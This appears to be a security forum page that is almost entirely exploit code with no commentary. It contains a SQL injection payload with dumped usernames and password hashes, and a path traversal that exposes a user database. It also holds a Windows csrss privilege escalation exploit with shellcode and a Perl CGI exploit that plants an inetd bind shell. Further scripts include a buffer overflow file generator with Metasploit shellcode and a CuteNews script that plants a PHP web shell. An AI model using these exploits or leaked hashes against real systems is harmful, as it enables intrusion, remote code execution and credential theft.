Cyber Security Forum (X-code) - PT. Teknologi Server Indonesia

Code: Select all

UNION+SELECT+1,concat_ws(0x3a,username,user_password),3,4,5,6,7,8,9,10+from+tbluser--

Code: Select all

harleygyoung:304011221bb6373bbfaff6b9ed9f5730

Code: Select all

Username :harleygyoung
Hash : 304011221bb6373bbfaff6b9ed9f5730

Code: Select all

file.php?file=../users.db.php

Code: Select all

<?PHP die("You don't have access to open this file !!!"); ?>
1213738930|1|Kty|4feff09ff463d728b9a4bc693146e6c7|Kty|[email protected]|1|0||1247808638||
1243237555|1|Evgenius|ee54fc17c198b85e98aedc110912ae70|||1|0||1244554956||
1247808679|1|Def|ce41ab87ba837da18cc3be5634bddd08|||0|0||||

Code: Select all

Tes 1.c
#define offs1 0x30
#define offs2 0xBBD0
#include "windows.h"
#include "stdio.h"
DWORD(WINAPI*NtConnectPort)(PHANDLE,PWORD,
PSECURITY_QUALITY_OF_SERVICE,PDWORD,PDWORD,PDWORD, PVOID,
PDWORD);
DWORD(WINAPI*NtQueryInformationProcess)(HANDLE,DWO RD,PVOID,
DWORD,PDWORD);
DWORD(WINAPI*NtRaiseHardError)(DWORD,DWORD,DWORD,P VOID*,
DWORD,PDWORD);
HANDLE hl;
HANDLE hs;
DWORD sb;
LPVOID lpc(LPCWSTR w){//cesar trick
WORD n[4];
SECURITY_QUALITY_OF_SERVICE q;
LPVOID p;
DWORD d;
DWORD c[6],s[3];
BYTE b[0x28];
n[0]=n[1]=wcslen(w)*2;
*(PDWORD)(n+2)=(DWORD)w;
memset(&q,0,sizeof(q));
q.Length=sizeof(q);
p=NULL;
d=0x1000;
memset(&c,0,sizeof(c));
c[0]=sizeof(c);
memset(&s,0,sizeof(s));
s[0]=sizeof(s);
memset(&b,0,sizeof(b));
b[1]=1;
hs=CreateFileMapping(INVALID_HANDLE_VALUE,NULL,
PAGE_READWRITE,0,d,NULL);
if(!hs)return NULL;
p=MapViewOfFile(hs,FILE_MAP_ALL_ACCESS,0,0,0);
if(!p)return NULL;
c[1]=(DWORD)hs;
c[3]=d;
c[4]=(DWORD)p;
d=sizeof(b);
if(NtConnectPort(&hl,n,&q,c,s,NULL,&b,&d))
return NULL;
sb=c[5];
return p;
}

HANDLE e1,e11;
DWORD WINAPI tp1(LPVOID a){
LPVOID p[7];
DWORD d;
p[0]=p+3;
p[1]=p+5;
p[2]=0;
p[3]=(LPVOID)0x1B001AE;
p[4]=L"\\??\\AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAA"
L"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAA"
L"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAA"
L"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ";
p[5]=(LPVOID)0x100010;
p[6]=L"erasmus1";
while(1){
WaitForSingleObject(e1,INFINITE);
NtRaiseHardError(0x40000018,3,3,p,0,&d);
SetEvent(e11);
}
return 0;
}

DWORD aaa,bbb;
HANDLE e2,e22;
DWORD WINAPI tp2(LPVOID a){
BYTE b[0xD8];
LPVOID p[7];
DWORD d;
memset(&b,0,sizeof(b));
*(PDWORD)(b+0x3C)=2;
*(PDWORD)(b+0x48)=1;
*(PDWORD)(b+0x4C)=1;
p[0]=p+3;
p[1]=p+5;
p[2]=0;
p[3]=(LPVOID)0xD600D6;
p[4]=&b;
p[5]=(LPVOID)0x100010;
p[6]=L"erasmus2";
while(1){
WaitForSingleObject(e2,INFINITE);
memcpy(&b,"C:\\TEST",8);
*(PDWORD)(b+0x08)=aaa;
*(PDWORD)(b+0x0C)=bbb;
*(PDWORD)(b+0x70)=aaa+0x100;
*(PDWORD)(b+0x74)=aaa+0x100;
NtRaiseHardError(0x40000018,3,3,p,0,&d);
SetEvent(e22);
}
return 0;
}

STARTUPINFO cps;
PROCESS_INFORMATION cpi;
void w(DWORD a,DWORD d){
HWND h;
aaa=d;
bbb=a;
SetEvent(e1);
do{h=FindWindow(NULL,"erasmus1");}while(!h);
CreateProcess(NULL,"notepad",NULL,NULL,0,0,NULL,NU LL,&cps,
&cpi);
Sleep(100);
SendMessage(h,WM_CLOSE,0,0);
Sleep(100);
SetEvent(e2);
do{h=FindWindow(NULL,"erasmus2");}while(!h);
TerminateThread(cpi.hThread,0);
Sleep(100);
CreateProcess(NULL,"notepad",NULL,NULL,0,0,NULL,NU LL,&cps,
&cpi);
Sleep(100);
SendMessage(h,WM_CLOSE,0,0);
Sleep(100);
}

int main(int c,char**v){
char sd[MAX_PATH];
char dp[MAX_PATH];
WCHAR pp[MAX_PATH];
WCHAR pn[MAX_PATH];
HMODULE nt,kr,ad;
DWORD se,cs,ws,u,d,h;
HANDLE t;
LPBYTE sc;
GetSystemDirectory(sd,sizeof(sd));
sprintf(dp,"%s\\csrsrv.dll",sd);
cs=(DWORD)LoadLibrary(dp);
sprintf(dp,"%s\\winsrv.dll",sd);
ws=(DWORD)LoadLibrary(dp);
sprintf(dp,"%s\\ntdll.dll",sd);
nt=LoadLibrary(dp);
sprintf(dp,"%s\\kernel32.dll",sd);
kr=LoadLibrary(dp);
sprintf(dp,"%s\\advapi32.dll",sd);
ad=LoadLibrary(dp);
*(LPVOID*)&NtConnectPort=GetProcAddress(nt,"NtConn ectPort");
*(LPVOID*)&NtQueryInformationProcess=GetProcAddres s(nt,
"NtQueryInformationProcess");
*(LPVOID*)&NtRaiseHardError=GetProcAddress(nt,
"NtRaiseHardError");
if(2==c){
d=atoi(v[1]);
if(!d){
printf("no args need\n");
return -1;
}
t=OpenProcess(PROCESS_ALL_ACCESS,0,d);
if(!t){
printf("no args need\n");
return -1;
}
__asm mov eax,fs:[0x18]
__asm mov eax,[eax+0x30]
__asm mov eax,[eax+0x1D4]
__asm mov se,eax
if(se)swprintf(pp,L"\\Sessions\\%d\\Windows",se);
else swprintf(pp,L"\\Windows");
swprintf(pn,L"%s\\ApiPort",pp);
sc=(LPBYTE)lpc(pn);
swprintf(pn,L"%s\\SbApiPort",pp);
if(!sc)sc=(LPBYTE)lpc(pn);
if(!sc)return -1;
h=0;
DuplicateHandle(GetCurrentProcess(),hs,t,(LPHANDLE )&h,0,0,2);
WriteProcessMemory(t,&hs,&h,4,&d);
WriteProcessMemory(t,&sb,&sb,4,&d);
Sleep(INFINITE);
}else{
STARTUPINFO cps;
PROCESS_INFORMATION cpi;
hs=sc=NULL;
sb=0;
memset(&cps,0,sizeof(cps));
cps.cb=sizeof(cps);
cps.dwFlags=STARTF_USESHOWWINDOW;
sprintf(sd,"\"%s\" %d",v[0],GetCurrentProcessId());
if(!CreateProcess(NULL,sd,NULL,NULL,0,
CREATE_NEW_PROCESS_GROUP|CREATE_NEW_CONSOLE,NULL,N ULL,&cps,
&cpi)){
printf("spawn fail\n");
return -1;
}
Sleep(3000);
if(!hs){
printf("lpc fail\n");
return -1;
}
sc=(LPBYTE)MapViewOfFile(hs,FILE_MAP_ALL_ACCESS,0, 0,0);
}
memset(&cps,0,sizeof(cps));
cps.cb=sizeof(cps);
cps.dwFlags=STARTF_USESHOWWINDOW;
e1=CreateEvent(NULL,0,0,NULL);
e11=CreateEvent(NULL,0,0,NULL);
CreateThread(NULL,0,tp1,NULL,0,NULL);
e2=CreateEvent(NULL,0,0,NULL);
e22=CreateEvent(NULL,0,0,NULL);
CreateThread(NULL,0,tp2,NULL,0,NULL);
u=cs+offs2;
*(PDWORD)(sc+offs1)=(DWORD)GetProcAddress(kr,"Load LibraryA");
w(u,sb);
Sleep(INFINITE);
return 0;
}



//tes 2.c
#define offs1 0x5F89
#define offs2 0xBBD0
#define offs3 0xBBFC
#define offs4 0x3F0CC
#include "windows.h"
LONG WINAPI uef(LPEXCEPTION_POINTERS a){
Sleep(INFINITE);
return 0;
}

DWORD WINAPI tp(LPVOID a){
HMODULE kr,ws;
BYTE b[0x100];
DWORD c,d;
HANDLE h,t;
kr=GetModuleHandle("kernel32");
ws=GetModuleHandle("winsrv");
h=OpenProcess(PROCESS_ALL_ACCESS,0,*(LPDWORD)((DWO RD)ws+offs4));
c=(DWORD)VirtualAllocEx((HANDLE)h,NULL,sizeof(b),M EM_COMMIT,PAGE_EXE
CUTE_READWRITE);
d=(DWORD)GetProcAddress(kr,"CreateProcessA")-(c+69);
memcpy(b,"\x33\xC0\x50\x50\x50\x50\x50\x50\x50\x50 \x50\x50\x50\x50\x
50\x50\xE8\x10\x00\x00\x00\x57\x69\x6E\x53\x74\x61 \x30\x5C\x44\x65\x
66\x61\x75\x6C\x74\x00\x50\x6A\x44\x8B\xCC\x68\x63 \x6D\x64\x00\x50\x
50\x50\x50\x54\x51\x50\x50\x50\x50\x50\x50\x83\xC1 \xFC\x51\x50\xE8\x
00\x00\x00\x00\x83\xC4\x58\xC3",73);
*(LPDWORD)(b+65)=d;
WriteProcessMemory((HANDLE)h,(LPVOID)c,b,sizeof(b) ,&d);
t=CreateRemoteThread((HANDLE)h,NULL,0,(LPTHREAD_ST ART_ROUTINE)c,NULL
,0,NULL);
WaitForSingleObject(t,INFINITE);
return 0;
}

BOOL WINAPI DllMain(HANDLE a,DWORD dwReason,LPVOID c){
DWORD cs,d;
LPDWORD p,f,l;
HANDLE h;
if(DLL_PROCESS_ATTACH==dwReason){
SetUnhandledExceptionFilter(uef);
h=CreateFile("C:\\OWNED.TXT",GENERIC_WRITE,0,NULL,
CREATE_ALWAYS,FILE_FLAG_WRITE_THROUGH,NULL);
WriteFile(h,"greetz from csrss!\r\n",20,&d,NULL);
CloseHandle(h);
cs=(DWORD)GetModuleHandle("csrsrv");
*(LPDWORD)(cs+offs2)=0;
__asm mov eax,esp
__asm mov p,eax
while(1){
if(cs+offs1==*p){
*p=(DWORD)ExitThread;
d=p[1]+8;
break;
}
p=p+1;
}
p=*(LPDWORD*)(cs+offs3)+2;
f=p;
while(d!=f[0])f=*(LPDWORD*)f;
l=p;
while(d!=l[1])l=*(LPDWORD*)(l+1);
*(LPDWORD*)f=l;
*(LPDWORD*)(l+1)=f;
for(d=0;d<100;d=d+1){
p=(LPDWORD)HeapAlloc(GetProcessHeap(),0,0xD8);
memset(p,0,0xD8);
p[2]=(DWORD)p+0x08;
p[3]=(DWORD)p+0x08;
p[4]=(DWORD)p+0x10;
p[5]=(DWORD)p+0x10;
p[13]=0x240000;
p[15]=1;
p[16]=1;
p[28]=(DWORD)p+0x78;
p[29]=(DWORD)p+0x80;
}
p=(LPDWORD)GetProcessHeap();
while(1){
p=p+1;
if(0x60005==*p&&p[1]>(DWORD)p&&p[1]<(DWORD)p+0x100&&
!strcmp(*(LPSTR*)(p+1),"CSRSS")){
d=p[1]+6;
while(1){
p=p-1;
if(d-(DWORD)p==*p)break;
}
break;
}
}
*(LPDWORD*)(cs+offs2)=p;
Sleep(0);
CreateThread(NULL,0,tp,NULL,0,NULL);
}
return TRUE;
}

Code: Select all

#!/usr/bin/perl -w
use strict; use Socket;

if (@ARGV < 1) {
    print("Usage: $0 <target>\n");
    exit(1);
}

my($target,$agent,$cgicode,$cgicode,$code,
   $iaddr,$paddr,$proto);

$target = $ARGV[0];
$agent = "Mozilla/4.0 (compatible; MSIE 5.01; Windows 95)";

print("\nRemote host: $target\n");
print("CGI-script: /cgi-bin/maillist.cgi\n");

$code =
"POST /cgi-bin/maillist.cgi HTTP/1.0
Connection: Keep-Alive
User-Agent: $agent
Host: $target
Content-type: application/x-www
Content-length: 160

";

$cgicode =


"\x65\x6d\x61\x69\x6c\x3d\x68\x61\x73\x73\x40\x2b\x26".
"\x65\x63\x68\x6f\x2b\x27\x66\x69\x64\x6f\x2b\x73\x74".
"\x72\x65\x61\x6d\x2b\x74\x63\x70\x2b\x6e\x6f\x77\x61".
"\x69\x74\x2b\x6e\x6f\x62\x6f\x64\x79\x2b\x2f\x62\x69".
"\x6e\x2f\x62\x61\x73\x68\x2b\x62\x61\x73\x68\x2b\x2d".
"\x69\x27\x2b\x3e\x2b\x2f\x74\x6d\x70\x2f\x2e\x68\x61".
"\x73\x73\x3b\x2f\x75\x73\x72\x2f\x73\x62\x69\x6e\x2f".
"\x69\x6e\x65\x74\x64\x2b\x2f\x74\x6d\x70\x2f\x2e\x68".
"\x61\x73\x73\x26\x42\x31\x3d\x4f\x4b\x26\x61\x63\x74".
"\x69\x6f\x6e\x3d\x73\x75\x62\x73\x63\x72\x69\x62\x65";

$cgicodeb =
"subject=teleh0rz+cgi+warez&message=hass";

send_code();
print("\nSleeping 5 seconds - waiting for the shell ...\n\n");
sleep(5); system("nc -w 10 $target 60179"); exit(0);

sub send_code {
    connect_host();
    send(SOCKET,"$code$cgicode\015\012", 0);
    close(SOCKET); connect_host();
    send(SOCKET,"$code$cgicode\015\012", 0);
    close(SOCKET);
}

sub connect_host {
    $iaddr = inet_aton($target);
    $paddr = sockaddr_in(80, $iaddr);
    $proto = getprotobyname('tcp');
    
    socket(SOCKET, PF_INET, SOCK_STREAM, $proto);
    connect(SOCKET, $paddr);
}

Code: Select all

nops = "\x90" * 4
ret = "\x75\x52\x46"; # call ebx

# win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
shellcode = (
"\x29\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\ x81\x73\x13\xc9"
"\x2c\xc9\x40\x83\xeb\xfc\xe2\xf4\x35\xc4\x8d\x40\ xc9\x2c\x42\x05"
"\xf5\xa7\xb5\x45\xb1\x2d\x26\xcb\x86\x34\x42\x1f\ xe9\x2d\x22\x09"
"\x42\x18\x42\x41\x27\x1d\x09\xd9\x65\xa8\x09\x34\ xce\xed\x03\x4d"
"\xc8\xee\x22\xb4\xf2\x78\xed\x44\xbc\xc9\x42\x1f\ xed\x2d\x22\x26"
"\x42\x20\x82\xcb\x96\x30\xc8\xab\x42\x30\x42\x41\ x22\xa5\x95\x64"
"\xcd\xef\xf8\x80\xad\xa7\x89\x70\x4c\xec\xb1\x4c\ x42\x6c\xc5\xcb"
"\xb9\x30\x64\xcb\xa1\x24\x22\x49\x42\xac\x79\x40\ xc9\x2c\x42\x28"
"\xf5\x73\xf8\xb6\xa9\x7a\x40\xb8\x4a\xec\xb2\x10\ xa1\xdc\x43\x44"
"\x96\x44\x51\xbe\x43\x22\x9e\xbf\x2e\x4f\xa8\x2c\ xaa\x02\xac\x38"
"\xac\x2c\xc9\x40"
)
num = 276 - 4 - 160
buff = "\x41" * num

exploit = nops + shellcode + buff + ret
try:
out_file = open("open_me.ofl",'w')
out_file.write(exploit)
out_file.close()
raw_input("\nNow open open_me.ofl file to exploit bug!\n")
except:
print "WTF?"

Code: Select all

#!/usr/bin/php -q
<?php
error_reporting(0);

list($cli,$host,$path,$username,$password) = $argv;

if ($argc != 5) {

print "\n+-------------------------------------------------------------+\n";
print "\r| CuteNews <= 1.4.6 - Remote Command Execution Exploit |\n";
print "\rUsage: php xpl.php [host] [path] [username] [password]\n\n";
print "\rhost + localhost\n";
print "\rpath + /cutenews\n";
print "\rusername + admin username\n";
print "\rpassword + admin password\n\n";
exit;
}

exploit();

function login () {

global $username,$password;

$cookies .= "username={$username}; md5_password=";
$cookies .= md5($password);

return $cookies;
}


function check_login() {

global $host,$path;

$auth .= login();

$data .= "GET /{$path}/index.php HTTP/1.1\r\n";
$data .= "Host: {$host}\r\n";
$data .= "User-Agent: Lynx (textmode)\r\n";
$data .= "Cookie: $auth;\n";
$data .= "Connection: close\r\n\r\n";

if (preg_match('/Welcome/i',$data)) {
return true;
}
else {
die("Login Failed\n");
}
}


function exploit() {

global $host,$path;

$login = login();
$shell = "PD9waHAgDQpwYXNzdGhydSgkX0dFVFsnYyddKTsgDQo/Pg==";

$shell = base64_decode($shell);
$post = "add_ip={$shell}&action=add&mod=ipban";

$data .= "POST /{$path}/index.php HTTP/1.1\r\n";
$data .= "Host: {$host}\r\n";
$data .= "User-Agent: Lynx (textmode)\r\n";
$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
$data .= "Cookie: $login\r\n";
$data .= "Referer: http://{$host}/{$path}/index.php\r\n";
$data .= "Content-Type: application/x-www-form-urlencoded\r\n";
$data .= "Content-Length: ".strlen($post)."\r\n\r\n";
$data .= "{$post}\r\n\r\n";

if (eregi('passthru',data_send($host,$data))) {
yeat_shell();
}
else {
die("Exploit Failed!\n");
}
}


function yeat_shell() {

while (1) {
echo "yeat[shell]~$: ";
$exec = stripslashes(trim(fgets(STDIN)));

if (preg_match('/^(exit|--exit|quit|--quit)$/i',$exec)) die("\nExited\n");
if (preg_match('/^(help|--help)$/i',$exec)) echo("\nExample: uname -a\n");
if (preg_match('/^(about|--about)$/i',$exec)) echo("\nstaker[at]hotmail[dot]it\n");

print data_exec($exec);
}
}


function data_exec($exec) {

global $host,$path;

$exec = urlencode($exec);
$data .= "GET /{$path}/data/ipban.db.php?c={$exec} HTTP/1.1\r\n";
$data .= "Host: {$host}\r\n";
$data .= "User-Agent: Lynx (textmode)\r\n";
$data .= "Connection: close\r\n\r\n";

$html = data_send ($host,$data);
$html = str_replace('|0||',null,$html);
return $html;
}


function data_send ($host,$data) {

if (!$sock = @fsockopen($host,80)) {
die("Connection refused,try again!\n");
} fputs($sock,$data);

while (!feof($sock)) { $html .= fgets($sock); }

fclose($sock);
return $html;
}

Code: Select all

#!/usr/bin/perl -w
# create file exploit > open it >
# Error : Access violation at 0x41414141 ( tried to read from 0x41414141 ), program terminated.
my $adresse = "AAAA" ;
my $nop = "\x90" x 261;

my $file = "Houssamix.sfs";
$exploit = $nop.$adresse;

open(my $FILE, ">>$file") or die "Cannot open $file: $!";
print $FILE $exploit ;


close($FILE);
print "$file has been created open it with Browse3D v 3.5\n";